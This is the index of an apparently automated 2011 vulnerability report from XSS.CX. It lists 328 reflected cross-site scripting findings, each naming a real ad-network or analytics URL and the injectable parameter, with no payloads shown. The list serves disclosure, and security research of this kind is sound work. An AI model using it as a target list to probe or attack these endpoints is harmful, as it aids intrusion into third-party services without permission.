XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10182011-03

Report generated by XSS.CX at Tue Oct 18 07:35:50 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search


1. Cross-site scripting (reflected)

1.1. http://a.netmng.com/hic/ [click parameter]

1.2. http://ad-emea.doubleclick.net/adi/N6344.150290.INVITE.COM/B5445429.7 [key parameter]

1.3. http://ad-emea.doubleclick.net/adi/N6344.150290.INVITE.COM/B5445429.7 [message parameter]

1.4. http://ad-emea.doubleclick.net/adi/N6344.150290.INVITE.COM/B5445429.7 [redirectURL parameter]

1.5. http://ad-emea.doubleclick.net/adi/N6344.150290.INVITE.COM/B5445429.7 [sz parameter]

1.6. http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.6 [mt_adid parameter]

1.7. http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.6 [mt_id parameter]

1.8. http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.6 [mt_uuid parameter]

1.9. http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.6 [redirect parameter]

1.10. http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.6 [sz parameter]

1.11. http://ad.doubleclick.net/adi/N5762.mediamath.com/B5383603.5 [mt_adid parameter]

1.12. http://ad.doubleclick.net/adi/N5762.mediamath.com/B5383603.5 [mt_id parameter]

1.13. http://ad.doubleclick.net/adi/N5762.mediamath.com/B5383603.5 [mt_uuid parameter]

1.14. http://ad.doubleclick.net/adi/N5762.mediamath.com/B5383603.5 [redirect parameter]

1.15. http://ad.doubleclick.net/adi/N5762.mediamath.com/B5383603.5 [sz parameter]

1.16. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.11 [mt_adid parameter]

1.17. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.11 [mt_id parameter]

1.18. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.11 [mt_uuid parameter]

1.19. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.11 [name of an arbitrarily supplied request parameter]

1.20. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.11 [redirect parameter]

1.21. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.11 [sz parameter]

1.22. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.5 [mt_adid parameter]

1.23. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.5 [mt_id parameter]

1.24. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.5 [mt_uuid parameter]

1.25. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.5 [name of an arbitrarily supplied request parameter]

1.26. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.5 [redirect parameter]

1.27. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.5 [sz parameter]

1.28. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.8 [mt_adid parameter]

1.29. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.8 [mt_id parameter]

1.30. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.8 [mt_uuid parameter]

1.31. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.8 [name of an arbitrarily supplied request parameter]

1.32. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.8 [redirect parameter]

1.33. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.8 [sz parameter]

1.34. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_a parameter]

1.35. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_c parameter]

1.36. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_d parameter]

1.37. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_eo parameter]

1.38. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_et parameter]

1.39. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_o parameter]

1.40. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_pm parameter]

1.41. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_pn parameter]

1.42. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [_s parameter]

1.43. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [redirect parameter]

1.44. http://ad.doubleclick.net/adi/x1.rtb/alldayslim/ron [sz parameter]

1.45. http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1 [_c parameter]

1.46. http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1 [_eo parameter]

1.47. http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1 [_o parameter]

1.48. http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1 [_pm parameter]

1.49. http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1 [_pn parameter]

1.50. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_a parameter]

1.51. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_c parameter]

1.52. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_d parameter]

1.53. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_eo parameter]

1.54. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_et parameter]

1.55. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_o parameter]

1.56. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_pm parameter]

1.57. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_pn parameter]

1.58. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_s parameter]

1.59. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [redirect parameter]

1.60. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [sz parameter]

1.61. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_a parameter]

1.62. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_c parameter]

1.63. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_d parameter]

1.64. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_eo parameter]

1.65. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_et parameter]

1.66. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_o parameter]

1.67. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_pm parameter]

1.68. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_pn parameter]

1.69. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_s parameter]

1.70. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [redirect parameter]

1.71. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [sz parameter]

1.72. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_a parameter]

1.73. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_c parameter]

1.74. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_d parameter]

1.75. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_eo parameter]

1.76. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_et parameter]

1.77. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_o parameter]

1.78. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_pm parameter]

1.79. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_pn parameter]

1.80. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_s parameter]

1.81. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [redirect parameter]

1.82. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [sz parameter]

1.83. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_a parameter]

1.84. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_c parameter]

1.85. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_d parameter]

1.86. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_eo parameter]

1.87. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_et parameter]

1.88. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_o parameter]

1.89. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_pm parameter]

1.90. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_pn parameter]

1.91. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_s parameter]

1.92. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [redirect parameter]

1.93. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [sz parameter]

1.94. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_a parameter]

1.95. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_c parameter]

1.96. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_d parameter]

1.97. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_eo parameter]

1.98. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_et parameter]

1.99. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_o parameter]

1.100. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_pm parameter]

1.101. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_pn parameter]

1.102. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_s parameter]

1.103. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [redirect parameter]

1.104. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [sz parameter]

1.105. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_a parameter]

1.106. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_c parameter]

1.107. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_d parameter]

1.108. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_eo parameter]

1.109. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_et parameter]

1.110. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_o parameter]

1.111. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_pm parameter]

1.112. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_pn parameter]

1.113. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [_s parameter]

1.114. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [redirect parameter]

1.115. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [sz parameter]

1.116. http://ad.doubleclick.net/adj/N3905.133090.MEDIAMATH/B5573625.8 [mt_adid parameter]

1.117. http://ad.doubleclick.net/adj/N3905.133090.MEDIAMATH/B5573625.8 [mt_id parameter]

1.118. http://ad.doubleclick.net/adj/N3905.133090.MEDIAMATH/B5573625.8 [mt_uuid parameter]

1.119. http://ad.doubleclick.net/adj/N3905.133090.MEDIAMATH/B5573625.8 [redirect parameter]

1.120. http://ad.doubleclick.net/adj/N3905.133090.MEDIAMATH/B5573625.8 [sz parameter]

1.121. http://ad.doubleclick.net/adj/N5798.133090.8212946998421/B5576949.26 [mt_adid parameter]

1.122. http://ad.doubleclick.net/adj/N5798.133090.8212946998421/B5576949.26 [mt_id parameter]

1.123. http://ad.doubleclick.net/adj/N5798.133090.8212946998421/B5576949.26 [mt_uuid parameter]

1.124. http://ad.doubleclick.net/adj/N5798.133090.8212946998421/B5576949.26 [redirect parameter]

1.125. http://ad.doubleclick.net/adj/N5798.133090.8212946998421/B5576949.26 [sz parameter]

1.126. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B5269038.26 [mt_adid parameter]

1.127. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B5269038.26 [mt_adid parameter]

1.128. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B5269038.26 [mt_id parameter]

1.129. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B5269038.26 [mt_uuid parameter]

1.130. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B5269038.26 [redirect parameter]

1.131. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B5269038.26 [sz parameter]

1.132. http://ad.doubleclick.net/adj/x1.rmx/discovercard/ron/chrome [click parameter]

1.133. http://ad.media6degrees.com/adserv/cs [name of an arbitrarily supplied request parameter]

1.134. http://ad.media6degrees.com/adserv/cs [tId parameter]

1.135. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1843.0.iframe.300x250/ord=1309234816 [click parameter]

1.136. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1843.0.iframe.300x250/ord=1309234816 [name of an arbitrarily supplied request parameter]

1.137. http://ad.yieldmanager.com/imp [u parameter]

1.138. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

1.139. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

1.140. http://adadvisor.net/adscores/g.js [_cx parameter]

1.141. http://adadvisor.net/adscores/g.js [_ri parameter]

1.142. http://api.bizographics.com/v1/profile.json [&callback parameter]

1.143. http://api.bizographics.com/v1/profile.json [api_key parameter]

1.144. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

1.145. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

1.146. http://ar.voicefive.com/b/rc.pli [func parameter]

1.147. http://b.scorecardresearch.com/beacon.js [c1 parameter]

1.148. http://b.scorecardresearch.com/beacon.js [c10 parameter]

1.149. http://b.scorecardresearch.com/beacon.js [c15 parameter]

1.150. http://b.scorecardresearch.com/beacon.js [c2 parameter]

1.151. http://b.scorecardresearch.com/beacon.js [c3 parameter]

1.152. http://b.scorecardresearch.com/beacon.js [c4 parameter]

1.153. http://b.scorecardresearch.com/beacon.js [c5 parameter]

1.154. http://b.scorecardresearch.com/beacon.js [c6 parameter]

1.155. http://b3.mookie1.com/2/TRACK_Xaxis/1028646844@x54 [&_RM_HTML_url_ parameter]

1.156. http://b3.mookie1.com/2/TRACK_Xaxis/1028646844@x54 [Page parameter]

1.157. http://b3.mookie1.com/2/TRACK_Xaxis/1028646844@x54 [REST URL parameter 2]

1.158. http://b3.mookie1.com/2/TRACK_Xaxis/1028646844@x54 [REST URL parameter 3]

1.159. http://b3.mookie1.com/2/TRACK_Xaxis/1028646844@x54 [Section parameter]

1.160. http://b3.mookie1.com/2/TRACK_Xaxis/1028646844@x54 [_RM_HTML_referer_ parameter]

1.161. http://b3.mookie1.com/2/TRACK_Xaxis/1028646844@x54 [_RM_HTML_title_ parameter]

1.162. http://b3.mookie1.com/2/TRACK_Xaxis/1028646844@x54 [name of an arbitrarily supplied request parameter]

1.163. http://b3.mookie1.com/2/TRACK_Xaxis/1047280635@x54 [&_RM_HTML_url_ parameter]

1.164. http://b3.mookie1.com/2/TRACK_Xaxis/1047280635@x54 [REST URL parameter 2]

1.165. http://b3.mookie1.com/2/TRACK_Xaxis/1047280635@x54 [REST URL parameter 3]

1.166. http://b3.mookie1.com/2/TRACK_Xaxis/1047280635@x54 [Section parameter]

1.167. http://b3.mookie1.com/2/TRACK_Xaxis/1047280635@x54 [_RM_HTML_referer_ parameter]

1.168. http://b3.mookie1.com/2/TRACK_Xaxis/1047280635@x54 [_RM_HTML_title_ parameter]

1.169. http://b3.mookie1.com/2/TRACK_Xaxis/1047280635@x54 [name of an arbitrarily supplied request parameter]

1.170. http://b3.mookie1.com/2/TRACK_Xaxis/1048171804@x54 [&_RM_HTML_url_ parameter]

1.171. http://b3.mookie1.com/2/TRACK_Xaxis/1048171804@x54 [REST URL parameter 2]

1.172. http://b3.mookie1.com/2/TRACK_Xaxis/1048171804@x54 [REST URL parameter 3]

1.173. http://b3.mookie1.com/2/TRACK_Xaxis/1048171804@x54 [Section parameter]

1.174. http://b3.mookie1.com/2/TRACK_Xaxis/1048171804@x54 [_RM_HTML_referer_ parameter]

1.175. http://b3.mookie1.com/2/TRACK_Xaxis/1048171804@x54 [_RM_HTML_title_ parameter]

1.176. http://b3.mookie1.com/2/TRACK_Xaxis/1048171804@x54 [name of an arbitrarily supplied request parameter]

1.177. http://b3.mookie1.com/2/TRACK_Xaxis/1138219538@x54 [&_RM_HTML_url_ parameter]

1.178. http://b3.mookie1.com/2/TRACK_Xaxis/1138219538@x54 [REST URL parameter 2]

1.179. http://b3.mookie1.com/2/TRACK_Xaxis/1138219538@x54 [REST URL parameter 3]

1.180. http://b3.mookie1.com/2/TRACK_Xaxis/1138219538@x54 [Section parameter]

1.181. http://b3.mookie1.com/2/TRACK_Xaxis/1138219538@x54 [_RM_HTML_referer_ parameter]

1.182. http://b3.mookie1.com/2/TRACK_Xaxis/1138219538@x54 [_RM_HTML_title_ parameter]

1.183. http://b3.mookie1.com/2/TRACK_Xaxis/1138219538@x54 [name of an arbitrarily supplied request parameter]

1.184. http://b3.mookie1.com/2/TRACK_Xaxis/1287345012@x54 [&_RM_HTML_url_ parameter]

1.185. http://b3.mookie1.com/2/TRACK_Xaxis/1287345012@x54 [REST URL parameter 2]

1.186. http://b3.mookie1.com/2/TRACK_Xaxis/1287345012@x54 [REST URL parameter 3]

1.187. http://b3.mookie1.com/2/TRACK_Xaxis/1287345012@x54 [Section parameter]

1.188. http://b3.mookie1.com/2/TRACK_Xaxis/1287345012@x54 [_RM_HTML_referer_ parameter]

1.189. http://b3.mookie1.com/2/TRACK_Xaxis/1287345012@x54 [_RM_HTML_title_ parameter]

1.190. http://b3.mookie1.com/2/TRACK_Xaxis/1287345012@x54 [name of an arbitrarily supplied request parameter]

1.191. http://b3.mookie1.com/2/TRACK_Xaxis/1295399308@x54 [&_RM_HTML_url_ parameter]

1.192. http://b3.mookie1.com/2/TRACK_Xaxis/1295399308@x54 [REST URL parameter 2]

1.193. http://b3.mookie1.com/2/TRACK_Xaxis/1295399308@x54 [REST URL parameter 3]

1.194. http://b3.mookie1.com/2/TRACK_Xaxis/1295399308@x54 [Section parameter]

1.195. http://b3.mookie1.com/2/TRACK_Xaxis/1295399308@x54 [_RM_HTML_referer_ parameter]

1.196. http://b3.mookie1.com/2/TRACK_Xaxis/1295399308@x54 [_RM_HTML_title_ parameter]

1.197. http://b3.mookie1.com/2/TRACK_Xaxis/1295399308@x54 [name of an arbitrarily supplied request parameter]

1.198. http://b3.mookie1.com/2/TRACK_Xaxis/1295663750@x54 [&_RM_HTML_url_ parameter]

1.199. http://b3.mookie1.com/2/TRACK_Xaxis/1295663750@x54 [REST URL parameter 2]

1.200. http://b3.mookie1.com/2/TRACK_Xaxis/1295663750@x54 [REST URL parameter 3]

1.201. http://b3.mookie1.com/2/TRACK_Xaxis/1295663750@x54 [Section parameter]

1.202. http://b3.mookie1.com/2/TRACK_Xaxis/1295663750@x54 [_RM_HTML_referer_ parameter]

1.203. http://b3.mookie1.com/2/TRACK_Xaxis/1295663750@x54 [_RM_HTML_title_ parameter]

1.204. http://b3.mookie1.com/2/TRACK_Xaxis/1295663750@x54 [name of an arbitrarily supplied request parameter]

1.205. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [&_RM_HTML_url_ parameter]

1.206. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [REST URL parameter 2]

1.207. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [REST URL parameter 3]

1.208. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [Section parameter]

1.209. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [_RM_HTML_referer_ parameter]

1.210. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [_RM_HTML_title_ parameter]

1.211. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [name of an arbitrarily supplied request parameter]

1.212. http://b3.mookie1.com/2/TRACK_Xaxis/1493531948@x54 [&_RM_HTML_url_ parameter]

1.213. http://b3.mookie1.com/2/TRACK_Xaxis/1493531948@x54 [REST URL parameter 2]

1.214. http://b3.mookie1.com/2/TRACK_Xaxis/1493531948@x54 [REST URL parameter 3]

1.215. http://b3.mookie1.com/2/TRACK_Xaxis/1493531948@x54 [Section parameter]

1.216. http://b3.mookie1.com/2/TRACK_Xaxis/1493531948@x54 [_RM_HTML_referer_ parameter]

1.217. http://b3.mookie1.com/2/TRACK_Xaxis/1493531948@x54 [_RM_HTML_title_ parameter]

1.218. http://b3.mookie1.com/2/TRACK_Xaxis/1493531948@x54 [name of an arbitrarily supplied request parameter]

1.219. http://b3.mookie1.com/2/TRACK_Xaxis/1642511786@x54 [&_RM_HTML_url_ parameter]

1.220. http://b3.mookie1.com/2/TRACK_Xaxis/1642511786@x54 [REST URL parameter 2]

1.221. http://b3.mookie1.com/2/TRACK_Xaxis/1642511786@x54 [REST URL parameter 3]

1.222. http://b3.mookie1.com/2/TRACK_Xaxis/1642511786@x54 [Section parameter]

1.223. http://b3.mookie1.com/2/TRACK_Xaxis/1642511786@x54 [_RM_HTML_referer_ parameter]

1.224. http://b3.mookie1.com/2/TRACK_Xaxis/1642511786@x54 [_RM_HTML_title_ parameter]

1.225. http://b3.mookie1.com/2/TRACK_Xaxis/1642511786@x54 [name of an arbitrarily supplied request parameter]

1.226. http://b3.mookie1.com/2/TRACK_Xaxis/1662816311@x54 [&_RM_HTML_url_ parameter]

1.227. http://b3.mookie1.com/2/TRACK_Xaxis/1662816311@x54 [REST URL parameter 2]

1.228. http://b3.mookie1.com/2/TRACK_Xaxis/1662816311@x54 [REST URL parameter 3]

1.229. http://b3.mookie1.com/2/TRACK_Xaxis/1662816311@x54 [Section parameter]

1.230. http://b3.mookie1.com/2/TRACK_Xaxis/1662816311@x54 [_RM_HTML_referer_ parameter]

1.231. http://b3.mookie1.com/2/TRACK_Xaxis/1662816311@x54 [_RM_HTML_title_ parameter]

1.232. http://b3.mookie1.com/2/TRACK_Xaxis/1662816311@x54 [name of an arbitrarily supplied request parameter]

1.233. http://b3.mookie1.com/2/TRACK_Xaxis/1662888868@x54 [&_RM_HTML_url_ parameter]

1.234. http://b3.mookie1.com/2/TRACK_Xaxis/1662888868@x54 [Page parameter]

1.235. http://b3.mookie1.com/2/TRACK_Xaxis/1662888868@x54 [REST URL parameter 2]

1.236. http://b3.mookie1.com/2/TRACK_Xaxis/1662888868@x54 [REST URL parameter 3]

1.237. http://b3.mookie1.com/2/TRACK_Xaxis/1662888868@x54 [Section parameter]

1.238. http://b3.mookie1.com/2/TRACK_Xaxis/1662888868@x54 [_RM_HTML_referer_ parameter]

1.239. http://b3.mookie1.com/2/TRACK_Xaxis/1662888868@x54 [_RM_HTML_title_ parameter]

1.240. http://b3.mookie1.com/2/TRACK_Xaxis/1662888868@x54 [name of an arbitrarily supplied request parameter]

1.241. http://b3.mookie1.com/2/TRACK_Xaxis/1793722233@x54 [&_RM_HTML_url_ parameter]

1.242. http://b3.mookie1.com/2/TRACK_Xaxis/1793722233@x54 [REST URL parameter 2]

1.243. http://b3.mookie1.com/2/TRACK_Xaxis/1793722233@x54 [REST URL parameter 3]

1.244. http://b3.mookie1.com/2/TRACK_Xaxis/1793722233@x54 [Section parameter]

1.245. http://b3.mookie1.com/2/TRACK_Xaxis/1793722233@x54 [_RM_HTML_referer_ parameter]

1.246. http://b3.mookie1.com/2/TRACK_Xaxis/1793722233@x54 [_RM_HTML_title_ parameter]

1.247. http://b3.mookie1.com/2/TRACK_Xaxis/1793722233@x54 [name of an arbitrarily supplied request parameter]

1.248. http://b3.mookie1.com/2/TRACK_Xaxis/1847468018@x54 [&_RM_HTML_url_ parameter]

1.249. http://b3.mookie1.com/2/TRACK_Xaxis/1847468018@x54 [REST URL parameter 2]

1.250. http://b3.mookie1.com/2/TRACK_Xaxis/1847468018@x54 [REST URL parameter 3]

1.251. http://b3.mookie1.com/2/TRACK_Xaxis/1847468018@x54 [Section parameter]

1.252. http://b3.mookie1.com/2/TRACK_Xaxis/1847468018@x54 [_RM_HTML_referer_ parameter]

1.253. http://b3.mookie1.com/2/TRACK_Xaxis/1847468018@x54 [_RM_HTML_title_ parameter]

1.254. http://b3.mookie1.com/2/TRACK_Xaxis/1847468018@x54 [name of an arbitrarily supplied request parameter]

1.255. http://bid.openx.net/json [c parameter]

1.256. http://btilelog.access.mapquest.com/tilelog/transaction [transaction parameter]

1.257. http://choices.truste.com/ca [c parameter]

1.258. http://choices.truste.com/ca [cam parameter]

1.259. http://choices.truste.com/ca [cid parameter]

1.260. http://choices.truste.com/ca [name of an arbitrarily supplied request parameter]

1.261. http://choices.truste.com/ca [plc parameter]

1.262. http://core.insightexpressai.com/adServer/GetInvite2.aspx [creativeID parameter]

1.263. http://core.insightexpressai.com/adServer/GetInvite2.aspx [esi parameter]

1.264. http://core.insightexpressai.com/adServer/GetInvite2.aspx [name of an arbitrarily supplied request parameter]

1.265. http://core.insightexpressai.com/adServer/GetInvite2.aspx [placementID parameter]

1.266. http://core.insightexpressai.com/adServer/GetInvite2.aspx [referer parameter]

1.267. http://core.insightexpressai.com/adServer/GetInvite2.aspx [siteID parameter]

1.268. http://core.insightexpressai.com/adServer/adServerESI.aspx [name of an arbitrarily supplied request parameter]

1.269. http://d.tradex.openx.com/afr.php [cb parameter]

1.270. http://d.tradex.openx.com/afr.php [loc parameter]

1.271. http://d.tradex.openx.com/afr.php [name of an arbitrarily supplied request parameter]

1.272. http://d.tradex.openx.com/afr.php [zoneid parameter]

1.273. http://delivery.steelhousemedia.com/serve [advid parameter]

1.274. http://delivery.steelhousemedia.com/serve [aid parameter]

1.275. http://delivery.steelhousemedia.com/serve [cb parameter]

1.276. http://delivery.steelhousemedia.com/serve [cgid parameter]

1.277. http://delivery.steelhousemedia.com/serve [cid parameter]

1.278. http://delivery.steelhousemedia.com/serve [ck parameter]

1.279. http://delivery.steelhousemedia.com/serve [click parameter]

1.280. http://delivery.steelhousemedia.com/serve [click parameter]

1.281. http://delivery.steelhousemedia.com/serve [eid parameter]

1.282. http://delivery.steelhousemedia.com/serve [guid parameter]

1.283. http://delivery.steelhousemedia.com/serve [ms parameter]

1.284. http://delivery.steelhousemedia.com/serve [name of an arbitrarily supplied request parameter]

1.285. http://delivery.steelhousemedia.com/serve [pp parameter]

1.286. http://delivery.steelhousemedia.com/serve [segid parameter]

1.287. http://delivery.steelhousemedia.com/serve [sh_rid parameter]

1.288. http://feed2js.org//feed2js.php [src parameter]

1.289. http://feed2js.org//feed2js.php [targ parameter]

1.290. http://financial.businessinsider.com/siliconalleymedia [Account parameter]

1.291. http://financial.businessinsider.com/siliconalleymedia [Module parameter]

1.292. http://financial.businessinsider.com/siliconalleymedia [REST URL parameter 1]

1.293. http://financial.businessinsider.com/siliconalleymedia [name of an arbitrarily supplied request parameter]

1.294. http://ib.adnxs.com/ab [ccd parameter]

1.295. http://ib.adnxs.com/ab [click parameter]

1.296. http://ib.adnxs.com/ab [cnd parameter]

1.297. http://ib.adnxs.com/ab [custom_macro parameter]

1.298. http://ib.adnxs.com/ab [pixel parameter]

1.299. http://ib.adnxs.com/ab [referrer parameter]

1.300. http://ib.adnxs.com/ab [tt_code parameter]

1.301. http://ib.adnxs.com/if [custom_macro parameter]

1.302. http://img.mediaplex.com/content/0/711/126780/82486_US_2011_Q2_Modern_Default_300x250.js [imp_rvr_id parameter]

1.303. http://img.mediaplex.com/content/0/711/126780/82486_US_2011_Q2_Modern_Default_300x250.js [mpck parameter]

1.304. http://img.mediaplex.com/content/0/711/126780/82486_US_2011_Q2_Modern_Default_300x250.js [mpvc parameter]

1.305. http://js.revsci.net/gateway/gw.js [ali parameter]

1.306. http://js.revsci.net/gateway/gw.js [cid parameter]

1.307. http://js.revsci.net/gateway/gw.js [clen parameter]

1.308. http://js.revsci.net/gateway/gw.js [csid parameter]

1.309. http://js.revsci.net/gateway/gw.js [p parameter]

1.310. http://js.revsci.net/gateway/gw.js [pid parameter]

1.311. http://js.revsci.net/gateway/gw.js [pli parameter]

1.312. http://js.revsci.net/gateway/gw.js [ref parameter]

1.313. http://js.revsci.net/gateway/gw.js [sid parameter]

1.314. http://js.revsci.net/gateway/gw.js [ver parameter]

1.315. http://js.revsci.net/gateway/gw.js [vid parameter]

1.316. http://newspulse.cnn.com/widget/json/social [callback parameter]

1.317. http://rtb50.doubleverify.com/rtb.ashx/verifyc [callback parameter]

1.318. http://sat.scoutanalytics.com/trb9r/Sat.ashx [id parameter]

1.319. http://sat.scoutanalytics.com/trb9r/Sat.ashx [sn parameter]

1.320. http://scout.scoutanalytics.net/fr8c8/Sat.ashx [id parameter]

1.321. http://scout.scoutanalytics.net/fr8c8/Sat.ashx [sn parameter]

1.322. http://segs.btrll.com/partner/bluekai/tpix [REST URL parameter 2]

1.323. http://segs.btrll.com/partner/bluekai/tpix [REST URL parameter 3]

1.324. http://serve.directdigitalllc.com/serve.php [click parameter]

1.325. http://serve.directdigitalllc.com/serve.php [name of an arbitrarily supplied request parameter]

1.326. http://servedby.flashtalking.com/imp/3/16303 [136713;201;js;AkamaiUS;InMarketShoppers300x250/?click parameter]

1.327. http://servedby.flashtalking.com/imp/3/16303 [cachebuster parameter]

1.328. http://servedby.flashtalking.com/imp/3/16303 [ftadz parameter]

